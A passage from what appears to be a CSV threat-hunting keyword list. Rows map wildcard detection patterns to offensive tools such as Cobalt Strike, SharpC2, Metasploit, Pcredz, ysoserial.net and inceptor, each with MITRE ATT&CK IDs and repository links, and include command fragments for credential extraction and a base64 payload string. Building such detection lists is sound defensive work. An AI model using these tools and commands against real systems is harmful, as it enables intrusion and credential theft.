,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*payload_msf.exe*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,1,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*payload_scripts.cna*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*payload_scripts/sleepmask*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and 
python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*payload_section.cpp*,offensive_tool_keyword,cobaltstrike,Achieve execution using a custom keyboard layout,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence,1,1,N/A,10,10,156,30,2023-05-23T20:34:26Z,2022-03-13T17:43:29Z -*payload_section.hpp*,offensive_tool_keyword,cobaltstrike,Achieve execution using a custom keyboard layout,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence,1,1,N/A,10,10,156,30,2023-05-23T20:34:26Z,2022-03-13T17:43:29Z -*payload_spellshell.c*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,0,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*payload_spellshell.exe*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,1,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*payload_tidy.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Payload_Type/freyja/*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*PayloadCommsHost*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*--payload-cookie*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*Payload-Download-Cradles*,offensive_tool_keyword,Payload-Download-Cradles,This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.,T1548 T1562 T1027 
,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Payload-Download-Cradles,1,1,N/A,N/A,3,241,54,2022-07-07T07:20:36Z,2021-05-14T08:56:54Z -*PayloadFormat.ASSEMBLY*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.DLL*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.EXE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.POWERSHELL*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.SHELLCODE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.SVC_EXE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z 
-*payloadgenerator.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*payloads/Follina*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*payloads/Powershell*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*payloads/shellcodes*,offensive_tool_keyword,Ninja,Open 
source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*payloads_examples*calc.js*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*payloads_examples*calc.xll*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*PayloadsAllTheThings*,offensive_tool_keyword,PayloadsAllTheThings,A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! ,T1210 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Bo0oM/PayloadsAllTheThings,1,1,N/A,N/A,1,4,4,2019-02-11T06:34:14Z,2019-02-11T06:29:45Z -*PayloadService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*--payload-type Macro*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*PayloadType.BIND_PIPE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadType.EXTERNAL*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadType.HTTP*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadType.REVERSE_TCP*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*--payload-url */pwn.html,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,0,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -*pcap_linktypes.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network 
protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*pcap2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pcapfile.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*PcapXray*,offensive_tool_keyword,PcapXray,Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. 
highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.,T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048,TA0001 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Srinivas11789/PcapXray,1,1,N/A,N/A,10,1501,270,2022-03-28T15:31:26Z,2017-10-02T04:47:51Z -*pcienlhnoficegnepejpfiklggkioccm*,greyware_tool_keyword,Cloud VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Pcredz -d *,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,0,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z -*Pcredz -f *,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,0,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z
-*PCredz -f *.pcap*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*Pcredz -i *,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,0,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z
-*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z
-*pdbedit -L -v*,greyware_tool_keyword,pdbedit,Sets the smbpasswd listing format. It will make pdbedit list the users in the database - printing out the account fields in a format compatible with the smbpasswd file format.,T1003.003 - T1087.001,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z
-*pdbedit -L -w*,greyware_tool_keyword,pdbedit,Enables the verbose listing format. 
It causes pdbedit to list the users in the database - printing out the account fields in a descriptive format,T1003.003 - T1087.001,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z
-*PDF_Payload*Doomfist.pdf*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z
-*pdf2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*pdfcrack -f *.pdf*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*PDONUT_INSTANCE*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z
-*pe_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*pe_packer/dll_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*pe_packer/exe_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*pe_packer/main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*pe_packer\dll_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - 
TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*pe_packer\exe_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*pe_packer\main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*pe_packer_exe.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z
-*pe2sh.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z
